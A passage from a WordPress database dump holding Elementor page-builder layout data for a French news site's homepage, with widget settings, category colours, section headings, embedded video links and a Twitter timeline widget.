"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":20}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2404,770,'_elementor_version','0.4'),(2405,770,'_elementor_css','a:3:{s:4:\"time\";i:1509372017;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2407,771,'_elementor_edit_mode','builder'),(2408,771,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_respon